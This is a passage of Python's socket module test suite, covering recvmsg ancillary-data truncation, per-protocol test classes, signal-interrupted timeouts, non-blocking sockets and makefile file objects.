@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
# operations use a `select()` call and handle EWOULDBLOCK/EGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# connect() didn't start: non-blocking accept() fails
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
